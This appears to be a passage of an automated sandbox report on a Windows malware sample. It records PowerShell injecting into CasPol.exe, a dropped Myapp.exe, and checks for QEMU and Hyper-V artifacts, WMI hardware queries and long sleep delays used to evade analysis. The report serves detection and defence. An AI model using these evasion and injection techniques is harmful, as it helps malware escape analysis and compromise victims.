Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000003.00000002.446829144.00000000076AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0$G
Source: powershell.exe, 00000003.00000002.446829144.00000000076AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 00000003.00000002.446761150.0000000007210000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: =C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Jump to behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6812	Thread sleep count: 7606 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6812	Thread sleep count: 1623 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6064	Thread sleep count: 3145 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6064	Thread sleep count: 6645 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -99108s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98449s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98338s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97902s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97685s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97465s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96668s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96338s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -96122s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95295s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -95077s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94956s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94499s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6104	Thread sleep time: -94390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe TID: 4444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6773	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2685	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 463	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7606	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1623	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 3145	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 6645	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 99108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98449	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98338	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97902	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96668	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96338	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 96122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 95077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94956	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 94390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

API call chain: ExitProcess graph end node

graph_0-3277

Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000003.00000002.446761150.0000000007210000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: =C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000003.00000002.446829144.00000000076AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0$g
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000003.00000002.446829144.00000000076AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000003.00000002.487761916.000000000E63A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 20_2_02429D7D mov eax, dword ptr fs:[00000030h]

20_2_02429D7D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_032DD020 LdrInitializeThunk,LdrInitializeThunk,

3_2_032DD020

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 700000			Jump to behavior
